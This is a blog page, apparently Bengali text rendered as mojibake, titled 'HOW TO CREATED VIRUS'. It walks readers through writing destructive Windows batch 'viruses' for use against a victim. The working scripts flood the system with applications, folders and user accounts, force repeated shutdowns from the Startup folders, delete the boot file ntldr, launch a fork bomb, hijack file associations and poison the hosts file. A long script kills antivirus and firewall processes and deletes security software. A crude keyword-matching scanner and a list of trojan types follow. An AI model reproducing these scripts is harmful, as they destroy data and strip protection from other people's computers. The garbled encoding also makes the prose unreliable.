Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

HOW TO CREATED VIRUS........


āĻāχ āĻĒোāϏ্āϟ āĻ āφāĻŽি āφāĻĒāύাāĻĻেāϰāĻ•ে āĻ…āύ্āϝ āĻ•োāύ āϏাāχāϟ āĻĨেāĻ•ে āĻŦা āύিāϜেāϰ āϞেāĻ–া  āĻ­াāχāϰাāϏ āϏ্āĻ•্āϰিāĻĒ্āϟ āĻĻি⧟ে āĻŦāϞāϤে āĻĒাāϰāϤাāĻŽ āĻāϟি .bat āύাāĻŽে āϏেāĻ­ āĻ•āϰুāύ । āφāϰ āĻ­াāχāϰাāϏ āĻŦাāύাāύ  āφāĻĒāύাāϰ āĻļāϤ্āϰুāĻ•ে āϧ্āĻŦংāϏ āĻ•āϰে āĻĻিāύ । āĻ•িāύ্āϤু āĻāϤে āφāĻĒāύি āĻāϰ āĻ—ুāϰুāϤ্āĻŦ āĻ•āϤāϟা āĻŦুāĻāϤে āĻĒাāϰāϤেāύ ? āĻāĻ­াāĻŦে āφāϰেāĻ•āϜāύেāϰ āĻĨেāĻ•ে āĻ•āĻĒি āĻ•āϰে āϞাāĻ­ āχ āĻŦা āĻ•ি ??? āϤাāχ āφāĻŽি āφāĻĒāύাāĻĻেāϰ āĻŦāϞāĻŦ batch file āĻāϰ āϏাāϤāĻ•াāĻšāύ । āϤাāϤে āφāĻĒāύি āύিāϜেāχ āĻ•āĻŽ্āϝাāύ্āĻĄ āĻĻি⧟ে āĻ­াāχāϰাāϏ āϏ্āĻ•্āϰিāĻĒ্āϟ , āĻāύ্āϟিāĻ­াāχāϰাāϏ āϏ্āĻ•্āϰিāĻĒ্āϟ āϞিāĻ–āϤে āĻĒাāϰāĻŦেāύ ।
āĻāĻ–াāύে āφāĻŽি āĻ•োāύ āϏ্āĻ•্āϰিāύāĻļāϟ āĻĻেāĻŦ āύা āĻ•াāϰāύ āφāĻŽি āύিāϜেāĻ“ āĻ…āύেāĻ• āϏাāχāϟ āĻĒ⧜ে āĻāĻŦং āĻ…āĻ­িāϜ্āĻžāϤা āĻĨেāĻ•ে āĻāϟি āϞিāĻ–āĻ›ি ...............
What are Batch Files ?
āĻāĻ•āϟা āωāĻĻাāĻšāϰāĻŖ āĻĻি⧟ে āĻļুāϰু āĻ•āϰা āϝাāĻ• । star āĻĨেāĻ•ে āϰাāύ āĻ āĻ—ি⧟ে cmd āĻ“āĻĒেāύ āĻ•āϰুāύ । āĻāĻ–āύ āφāĻĒāύাāϰ āĻĄাāχāϰেāĻ•্āϟāϰি "Desktop" āĻĨেāĻ•ে āϏāϰাāϤে "Cd Desktop" āϟাāχāĻĒ āĻ•āϰুāύ āωāĻĻ্āϧāϰāύ āϚিāĻš্āύ āĻ›া⧜া । āĻāĻ–āύ āύিāϚেāϰ āϤিāύāϟি āĻ•āĻŽ্āϝাāύ্āĻĄ āĻāĻ• āĻāĻ• āĻ•āϰে āϞিāĻ–ুāύ ।

1. md x  //makes directory 'x' on desktop
2. cd x  // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
āϞāĻ•্āώ্āϝ āĻ•āϰুāύ āφāĻŽāϰা āĻ•ি āĻ•āϰāϞাāĻŽ । āĻĒ্āϰāĻĨāĻŽে x āĻĢোāϞ্āĻĄাāϰ āϤৈāϰি āĻ•āϰāϞাāĻŽ । āĻāϰāĻĒāϰ āĻāϰ āĻ­েāϤāϰে āĻ—ি⧟ে y āĻĢোāϞ্āĻĄাāϰ āϤৈāϰি āĻ•āϰāϞাāĻŽ। āĻāϰāĻĒāϰ x āĻĄিāϞিāϟ āĻ•āϰে āĻĻিāϞাāĻŽ ।
āĻāĻ–āύ āĻāχ āĻ•াāϜ āϟাāχ āĻāĻ•āϟু āĻ…āύ্āϝ āĻ­াāĻŦে āĻ•āϰুāύ । āĻāĻ—ুāϞāĻ•ে āύি⧟ে āύোāϟāĻĒ্āϝাāĻĄ āĻ āĻ•āĻĒি āĻ•āϰে āϏেāĻ­ āĻ•āϰুāύ । āύাāĻŽ āĻāϰ āĻļেāώ āĻ .bat āĻĨাāĻ•āϤে āĻšāĻŦে ।
āϤাāĻšāϞে āĻĻেāĻ–āĻŦেāύ āωāĻĒāϰে āĻŦāϰ্āĻŖিāϤ āĻ•াāϜ āϟা āĻšāĻŦে ।
āϤাāĻšāϞে āĻŦোāĻা āĻ—েāϞ batch āĻšāϚ্āĻ›ে āĻāĻŽāύ āϧāϰāύেāϰ āĻĢাāχāϞ āϟাāχāĻĒ āϝা āĻšāϞ āϤাāϰ āĻŽāϧ্āϝে āĻĻে⧟া āĻ•āĻŽ্āϝাāύ্āĻĄ āĻ—ুāϞāĻ•ে āĻ…āύুāϏāϰāύ āĻ•āϰে āĻ•াāϜ āĻ•āϰে । āφāĻĒāύি āĻšā§ŸāϤāĻŦা āĻŽāύে āĻ•āϰāĻŦেāύ Malware āĻŦা āĻ›োāϟ Trojan āĻŦাāύাāύ āĻ–ুāĻŦ āĻ•āĻ িāύ । āϏেāϰāĻ•āĻŽ āύা । āĻ•িāύ্āϤু āϝে āĻŦাāύাāĻŦে āϤাāϰ āĻŽাāύāϏিāĻ•āϤাāχ āφāϏāϞ

What can batch viruses do ?
āĻĒ্āϰāĻļ্āύ āĻšāϞ āĻāĻĻেāϰ āĻĻি⧟ে āĻ•ি āĻ•ি āĻ•াāϜ āĻ•āϰা āϝা⧟ ??
āĻāĻĻেāϰ āĻĻি⧟ে āĻ…āύেāĻ• āĻ•াāϜ āĻ•āϰা āϝা⧟ āϝেāĻŽāύ āϧāϰুāύ āĻĄাāϟা āĻĄিāϞিāϟ āĻ•āϰা। āĻĄ্āϰাāχāĻ­ āĻĢāϰāĻŽেāϟ
, āϤāĻĨ্āϝ āϚুāϰি , āĻ­াāχāϰাāϏ āχāĻž্āϜেāĻ•্āϟ, āĻĒাāϰāĻĢāϰ্āĻŽেāύ্āϏ āĻŦাāϧা āĻ—্āϰāϏ্āĻĨ āĻ•āϰা । āĻ–াāĻŽাāĻ•া āĻŽাāύুāώ āĻ•ে āĻŦিāĻĒāĻĻে āĻĢেāϞা āĻāϏāĻŦ............
āĻāĻ–āύ āĻ•িāĻ›ু āωāĻĻাāĻšāϰāĻŖ āĻĒ্āϰ্āϝাāĻ•āϟিāϏ āĻ•āϰা āϝাāĻ•। āύিāϚেāϰ āĻ•োāĻĄ āĻ—ুāϞো āĻĒিāϏিāϤে āϏেāĻ­ āĻ•āϰে  āĻĻেāĻ–ুāύ ।
1.  Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
 āĻĒ্āϰāĻĨāĻŽে āφāĻĒāύাāĻ•ে @echo off āĻĻি⧟ে āĻĢাāχāϞ āĻ•ে āĻ…āύ্āϝ āĻĢাāχāϞ āĻĨেāĻ•ে āφāϞাāĻĻা āĻ•āϰāϤে āĻšāĻŦে । āĻāϰāĻĒāϰ āĻāχ āϏāĻŦ āĻāĻ•āϏাāĻĨে āĻŦা āφāϞাāĻĻা āφāϞাāĻĻাāĻ­াāĻŦে āύোāϟāĻĒ্āϝাāĻĄ āĻ āϞিāĻ–ে .bat āĻĻি⧟ে āϝে āĻ•োāύ āύাāĻŽে āϏেāĻ­ āĻ•āϰুāύ । āĻāĻ—ুāϞো āĻ•্āώāϤিāĻ•āϰ āύা । āφāĻĒāύি āĻ“āĻĒেāύ āĻ•āϰāϤে āĻĒাāϰেāύ । āϤāĻŦে āĻāĻ­াāĻŦেāχ āĻ•āĻŽাāύ্āĻĄ āĻ•āĻŽ্āĻŦাāχāύ্āĻĄ āĻ•āϰে victim āĻ•ে āĻŦিāϰāĻ•্āϤ āĻ•āϰা āĻšā§Ÿ ।
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

%random% āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻŦāϞা āĻšā§ŸেāĻ›ে āϝে āĻ•োāύ āϧāύাāϤ্āĻŽāĻ• āϏংāĻ–্āϝা āĻĒ্āϰিāύ্āϟ āĻ•āϰāϤে । āϝাāϰ āĻĢāϞে āĻāϟি āĻ“āĻĒেāύ āĻ•āϰāϞে āϝে āĻ•োāύ āĻĄ্āϰাāχāĻ­ āĻ āĻāϟি āĻĢোāϞ্āĻĄাāϰ āĻŦাāύাāϤেāχ āĻĨাāĻ•āĻŦে । āĻāϟি āĻĒিāϏিāϤে āĻ“āĻĒেāύ āĻ•āϰāĻŦেāύ āύা ।
3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x
āĻāϟি āϝেāĻ•োāύো āύাāĻŽ্āĻŦাāϰ āĻŦāϏি⧟ে āωāχāύ্āĻĄোāϜ āĻ āχāωāϝাāϰ account āϤৈāϰি āĻ•āϰāϤে āĻĨাāĻ•āĻŦে

4.Shutdown Virus
shutdown -s -t 00  //
āĻāχ āĻ•োāĻĄ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻĒিāϏি āϏাāĻĨে āϏাāĻĨে āĻŦāύ্āϧ āĻšā§Ÿে āϝাāĻŦে । āĻŽāύে āĻšāĻŦে āĻšাāϰ্āĻĄāĻĄিāϏ্āĻ• āĻĢেāχāϞ āĻ•āϰেāĻ›ে
āĻ•িāύ্āϤু āĻāϟি āĻāĻ•āĻŦাāϰ āĻāχ āĻšāĻŦে āφāĻĒāύি āϝāĻĻি āĻāϟি āϚাāϞু āϰাāĻ–āϤে āϚাāύ āϤāĻŦে “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  āĻāĻŦং  “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”āϤে āĻĒেāϏ্āϟ āĻ•āϰāϤে āĻšāĻŦে । āϝাāϰ āĻĢāϞে āĻĒিāϏি āĻ›া⧜া āĻšāϞে āĻŦাāϰāĻŦাāϰ āĻāϟি āĻšāϤে āĻĨাāĻ•āĻŦে । āφāĻĒāύাāĻ•ে āφāχ āĻĻুāχ āĻĄিāϰেāĻ•্āϟāϰি āĻĨেāĻ•ে āĻĢাāχāϞ āĻĻিāϞিāϟ āĻ•āϰে āĻāϟি āĻŦāύ্āϧ āĻ•āϰāϤে āĻšāĻŦে ।
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
āĻāĻ–āύ 'Show hidden files and folders'. āĻ āϚেāĻ• āĻĻি⧟ে āĻŦেāϰ āĻšā§Ÿে āφāϏুāύ । āĻāĻ–āύ āφāĻĒāύি āĻ…āĻĒাāϰেāϟিং āϏিāϏ্āϟেāĻŽ āĻāϰ āĻĢাāχāϞ āĻĻেāĻ–āϤেāĻ“ āĻĒাāĻŦেāύ । 'ntldr'  āύাāĻŽে āĻāĻ•āϟি āĻĢাāχāϞ āφāĻ›ে āϝা āωāχāύ্āĻĄোāϜ āĻāϰ āĻŦূāϟ āύি⧟āύ্āϤ্āϰāύ āĻ•āϰে . āĻāĻ–āύ āĻāĻ•ে āĻĄিāϞিāϟ āĻ•āϰāϤে āĻāĻ•āϟা āĻŦ্āϝাāϚ āĻĢাāχāϞ āĻŦাāύাāĻŦ
attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file
   āĻāϟি āϰাāύ āĻ•āϰাāϰ āϏাāĻĨে āϏাāĻĨে āĻĢাāχāϞ āϟি āĻĄিāϞিāϟ āĻšā§Ÿে āϝাāĻŦে । āφāĻĒāύি āύিāϜেāϰ āĻĒিāϏি āϤে āĻāϟি āϰাāύ āĻ•āϰāĻŦেāύ āύা ।
5. Fork Bomb
%0|%0  //Its percentage zero pipe percentage zero
āĻāχ āĻ•োāĻĄ āĻĢাāχāϞ āĻŽ্āϝাāύেāϜাāϰ āĻ•ে āĻŦāϞāĻŦে āĻ—ুāύ āĻšāϤে । āϝাāϰ āĻĢāϞে āφāĻĒāύাāϰ āĻ…āϜাāύ্āϤে āĻĒিāϏিāϤে āĻ•্āϝাāĻļ āĻŽেāĻŽāϰি āĻŦে⧜ে āϝাāĻŦে āĻļেāώ āĻ āĻĒিāϏি āĻš্āϝাঁ ং āĻšāĻŦে
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          
āĻĒ্āϰāϤāϟি āĻĢাāχāϞ āĻāϰ āφāϞাāĻĻা āĻĢāϰāĻŽেāϟ āφāĻ›ে āϝেāĻŽāύ .exe, .jpeg, .mkv āχāϤ্āϝাāĻĻি । āĻāχ āĻ•োāĻĄ  āϚাāϞাāĻŦাāϰ  āϏাāĻĨে āϏাāĻĨে āϏāĻŦ āĻĢāϰāĻŽেāϟ āĻ“ āϞāϟ āĻĒাāϞāϟ āĻšā§Ÿে āϝাāĻŦে āĻāĻŦং । āĻĒ্āϰোāĻ—্āϰাāĻŽ āϰি āχāύ্āϏāϟাāϞ āĻ•āϰāϤে āĻšāĻŦে । āϤাāχ āĻ…āύ্āϤāϤ āĻĒিāϏি āϤে āĻāϟি āϚāϞাāĻŦেāύ āύা ।
7.  DNS Poisoning
āφāĻĒāύাāϰ āωāχāύ্āĻĄোāϜ āĻ  ‘hosts’ āύাāĻŽে āĻĢাāχāϞ  āφāĻ›ে āĻāĻ–াāύে  c:\windows\system32\drivers\etc. āφāĻŽāϰা āĻāĻ–াāύে āĻāĻ•āϟি āφāχāĻĒি āĻāĻŦং āĻ“ā§ŸেāĻŦāϏাāχāϟ āĻŦāϏি⧟ে āĻĻিāϤে āĻĒাāϰি . āϤাāĻšāϞে āφāĻŽাāĻĻেāϰ āĻŦ্āϰাāωāϝাāϰ āϏেāχ āĻ“ā§ŸেāĻŦāϏাāχāϟ āĻ āφāĻŽাāĻĻেāϰ āύি⧟ে āϝাāĻŦে .
@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts   //āĻāχ āĻ•āĻŽ্āϝাāύ্āĻĄ āϤাāĻšāϞে āφāχāĻĒি āĻāĻŦং āĻ“ā§ŸেāĻŦāϏাāχāϟ āĻ•ে host āĻ āĻĒ্āϰিāύ্āϟ āĻ•āϰāĻŦে
 xxx.xxx.xxx.xxx  āĻāĻŦং  http://www.anything.com  āĻ āφāĻĒāύাāϰ āĻ•াāĻ™্āĻ–িāϤ āφāχāĻĒি āĻāĻŦং āĻ“ā§ŸেāĻŦāϏাāχāϟ āĻŦāϏাāĻŦেāύ । āĻāϰāĻĢāϞে āϝে āĻāϟি āĻ“āĻĒেāύ āĻ•āϰāĻŦে āϏে āϏেāχ āϏাāχāϟ āĻ›া⧜া āϤাāϰ āĻŦ্āϰাāωāϝাāϰ āĻ…āύ্āϝ āϏাāχāϟ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύা ।
 Limitations of Batch Viruses -:
āĻ•িāύ্āϤু āĻ•িāĻ›ু āϏāĻŽāϏ্āϝা āφāĻ›ে ...............
āϝে āĻ•েāω āĻāϟি āĻ“āĻĒেāύ āύা āĻ•āϰে āύোāϟ āĻĒ্āϝাāĻĄ āĻĻি⧟ে āĻ­িāω āĻ•āϰāϤে āĻĒাāϰে । āϝাāϰ āĻĢāϞে āϏে āϏāϤāϰāĻ• āĻšā§Ÿে āϝাāĻŦে ।
āĻāϟি āĻ­াāχāϰাāϏ āĻšāϞে āφāύ্āϟিāĻ­াāχāϰাāϏ āĻ“ āωāχāύ্āĻĄোāϜ AlaRt āĻĻেāĻŦে । āĻāϰ āϏāĻŽাāϧাāύ āφāĻ›ে ।
āĻ•িāύ্āϤু āφāĻŽি āĻŦāϞāĻ›ি āύা । āĻ–াāϰাāĻĒ āĻĒাāϰāĻĒাāϏে  āĻŦ্āϝাāĻŦāĻšাāϰ āĻšāϤে āĻĒাāϰে ।

āĻāĻ•āϟা āĻ…āĻĢ āϟāĻĒিāĻ• । āĻ­াāϞ āύা āϞাāĻ—āϞে āĻā§œি⧟ে āϝাāύ 
āĻ āĻĒāϰ্āϝāύ্āϤ āϝাāϰা āφāĻŽাāϰ āĻŦāĻ•āĻŦāĻ• āĻļুāύেāĻ›েāύ āϤাāĻĻেāϰ āϧাāϰāύা āĻšā§ŸেāĻ›ে āĻāĻ—ুāϞো āĻĻি⧟ে āĻļুāϧু āφāϝেāĻŦাāϝে āĻ•াāϜ āĻ•āϰা āϝা⧟ । āϤা āύা ......
āφāĻŽি āĻāĻ•āϟা āĻ›োāϟāĻ–াāϟো batch antivirus āĻāϰ āĻ•ো āĻĄ āĻ•āϰেāĻ›ি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______   BCA   ___________
āĻāϟি āφāĻĒāύাāϰ āĻĒিāϏি āϤে zekono kichu .bat āύাāĻŽে āϏেāĻ­ āĻ•āϰুāύ । āĻāϟিāϤে āφāĻĒāύি āϝে āĻ•োāύ .bat āĻĢাāχāϞ āĻāϰ āύাāĻŽ āϞিāĻ–ে āϏ্āĻ•্āϝাāύ āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ ।

World Top virus code(any hard disk crash))

Just copy the code and paste the notepad than save as """pleasehack.bat""  mind it  ".bat"
than save.carefully don"t open bat file.


@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --


TROJAN INJECTING AND TROJAN BACKDOR.......

āϟ্āϰোāϜাāύ āφāϰ āĻŦ্āϝাāĻ• āĻĄোāϰ āĻšāϞ āĻĻুāϟি āĻĒāĻĻ্āϧāϤি āϝাāϰ āĻŽাāϧ্āϝāĻŽে āĻāĻ•āϜāύ āĻš্āϝাāĻ•াāϰ āĻ•োāύ āϏিāϏ্āϟেāĻŽ āĻ āĻĒ্āϰāĻŦেāĻļ āĻ•āϰāϤে āĻĒাāϰেāύ ।āϏাāϧাāϰāύāϤ āĻŦ্āϝাāĻ• āĻĄোāϰ āĻŦা āϟ্āϰোāϜাāύ āĻāĻ•āϟি āϏিāϏ্āϟেāĻŽ āĻ āĻ…āύ্āϝ āĻ•োāύ āĻĒ্āϰোāĻ—্āϰাāĻŽ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻĒ্āϰāĻŦেāĻļ āĻ•āϰে ।āχāĻĨিāĻ•াāϞ āĻš্āϝাāĻ•াāϰ āϏাāϧাāϰāύ āĻ­াāĻŦে āĻĒāϰীāĻ•্āώা āĻ•āϰাāϰ āϜāύ্āϝ āĻāĻ—ুāϞো āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĨাāĻ•েāύ । āĻāχ āĻĻুāϟি āĻšāϞ āĻŽ্āϝাāϞāĻ“ā§Ÿাāϰ āĻāϰ āĻāĻ•āϟি āϰুāĻĒ āϝা āĻ…āύ্āϝ āĻ•োāύ āϏাāϰ্āĻ­াāϰ āĻ āĻ…āύ্āϝ āĻĢাāχāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āϝাāĻŦাāϰ āϚেāώ্āϟা āĻ•āϰে ।

āφāϰ āĻŦ্āϝাāĻ• āĻĄোāϰ āĻŦāϞāϤে āĻŦোāĻাāύো āĻšā§Ÿ āĻāĻ•āϟি āĻĒāĻĨ āϤৈāϰি āĻ•āϰা āϝাāϰ āĻŽাāϧ্āϝāĻŽে  āϟ্āϰোāϜাāύ āĻ•োāύ āϏিāϏ্āϟেāĻŽ āĻ āĻĒ্āϰāĻŦেāĻļ āĻ•āϰে। āϏাāϧাāϰāύāϤ āϟ্āϰোāϜাāύ āĻ•োāύ āĻ…āύ্āϝ āĻ›āĻŦি āĻŦা āĻŽিāωāϜিāĻ• āĻĢাāχāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻ›ā§œি⧟ে āϝা⧟ । āĻāϤে Steganography āĻĒāĻĻ্āϧāϤি āϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰা āĻšā§Ÿ । āĻāϟি āϏāĻŽ্āĻĒāϰ্āĻ•ে āύা āϝাāύāϞে āφāĻŽি āĻ āύি⧟ে āϞিāĻ–েāĻ›ি । āϏেāϟি āĻĒ⧜ে āύিāĻŦেāύ ।। āϏাāϧাāϰāύ āĻ­াāĻŦে āϟ্āϰোāϜাāύ āĻ›ā§œাāύোāϰ āϏāĻŦāĻĨেāĻ•ে āϏāĻšāϜ āωāĻĒা⧟ āĻšāϞ āĻŦ্āϝাāϚ āĻĢাāχāϞ āĻŦা āĻāĻ•ে .exe āϤে āϰুāĻĒাāύ্āϤāϰ āĻ•āϰে āχāύ্āϏāϟāϞাāϰ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻ›ā§œি⧟ে āĻĻে⧟া । āĻāϤে āĻš্āϝাāĻ•াāϰ āϰা āĻŦিāĻ­িāύ্āύ āϧāϰāύেāϰ GUI āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāύ āĻ…āύ্āϝ āĻĻেāϰ āφāĻ•ৃāώ্āϟ āĻ•āϰাāϰ āϜāύ্āϝ ।
āĻ•ā§ŸেāĻ•āϟি āĻ•āĻŽāύ āϟ্āϰোāϜাāύ  :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise

āĻāĻ—ুāϞāϰ āĻŽāϧ্āϝে āϏāĻŦāĻĨেāĻ•ে āĻŦিāĻĒāĻĻāϜāύāĻ• āĻšāϚ্āĻ›ে  Girlfriend āĻāĻŦং Netbus । āĻ•াāϰāύ āĻāĻ—ুāϞো āĻŦ্āϝাāϚ āĻĢাāχāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āϤৈāϰি āĻ•āϰা āϝা⧟ । āĻāĻŦং āĻ•োāĻĄেāϰ āĻ•ā§ŸেāĻ•āϟি āϞাāχāύ āĻĒāϰিāĻŦāϰ্āϤāύ āĻ•āϰে āĻĻিāϞেāχ āĻĻুāϰ্āϧāϰ্āώ āĻ­াāχāϰাāϏ  āĻ āĻĒāϰিāύāϤ āĻšā§Ÿ । āφāĻĒāύি āϝāĻĻি āĻš্āϝাāĻ•াāϰ āĻšāϤে āϚাāύ āĻŦা āϏিāĻ•িāωāϰিāϟি āύি⧟ে āĻ•াāϜ āĻ•āϰāϤে āϚাāύ āφāĻĒāύাāĻ•ে āĻ…āĻŦāĻļ্āϝāχ āĻāĻ—ুāϞো āύি⧟ে āĻ•াāϜ āĻ•āϰāϤে āĻšāĻŦে । āĻ•িāύ্āϤু āύিāϜেāϰ āĻ•āĻŽ্āĻĒিāωāϟাāϰ āĻ āĻ—ুāϞো āύি⧟ে āϘাāϟাāϘাāϟি āύা āĻ•āϰে āĻ•োāύ āĻ­াāϰ্āϚু⧟াāϞ āĻĒāϰিāĻŦেāĻļ āϤৈāϰি āĻ•āϰাāχ āĻ­াāϞ । āϝেāĻŽāύ āϝাāϰা Comodo  āĻāϰ āĻ­াāϰ্āϚু⧟াāϞ āϏিāĻ•িāωāϰিāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāύ āϤাāϰা āϝাāύেāύ । āĻāχ āĻ­াāχāϰাāϏ āĻ—ুāϞো āύি⧟ে āĻ•াāϜ āĻ•āϰা āĻ•āϤāϟা āĻŦিāĻĒāĻĻāϜāύāĻ• ।
āϟ্āϰোāϜাāύ āĻāϰ āĻĒ্āϰāĻ•াāϰāĻ­েāĻĻ
āĻŦিāĻ­িāύ্āύ āϧāϰেāύেāϰ āϟ্āϰোāϜাāύ āφāĻ›ে । āϏেāĻ—ুāϞāϰ āĻ•ā§ŸেāĻ•āϟি āύিāϚে āϤুāϞে āϧāϰা āĻšāϞ :
Remote Access Trojans : āĻ•োāύ āϏিāϏ্āϟেāĻŽ āĻ āϰিāĻŽোāϟ āĻ…্āϝাāĻ•্āϏেāϏ āĻĒেāϤে āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰা āĻšā§Ÿ

Data Sending Trijans : āĻāϟি āϏাāϧাāϰāύāϤ āĻĄাāϟা āĻ–ুঁāϜে āĻŦেāϰ āĻ•āϰে āĻš্āϝাāĻ•াāϰ āĻāϰ āĻ•াāĻ›ে āϤা āĻĒাāĻ ি⧟ে āĻĻে⧟ ।
Destructive Trojans: āĻāϰ āϏাāĻšাāϝ্āϝে āĻ•āĻŽ্āĻĒিāωāϟাāϰ āĻāϰ āĻ•্āώāϤি āĻ•āϰা āĻšā§Ÿ ।
FTP trojans: āĻāϟিāĻ•ে āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāϤে āĻš্āϝাāĻ•াāϰ āϰা port 21 āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĨাāĻ•েāύ ।
SSDT: āĻāϟিāϰ āĻĒূāϰ্āĻŖāϰূāĻĒ āφāĻĒāύাāϰা āĻ•াāϜ āĻļুāύāϞেāχ āĻŦুāĻāϤে āĻĒাāϰāĻŦেāύ । āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻ•োāύ āύিāϰ্āĻĻিāώ্āϟ āĻŦা āĻ…āύেāĻ•āĻ—ুāϞ antivirus āĻĒ্āϰোāĻ—্āϰাāĻŽ āĻ•ে āĻ…āĻ•েāϜ   āĻ•āϰে āĻĻে⧟া āĻšā§Ÿ ।
āĻ•ā§ŸেāĻ•āϟি āϟ্āϰোāϜাāύ āĻĒ্āϰোāĻ—্āϰাāĻŽ

Troj_OAJ

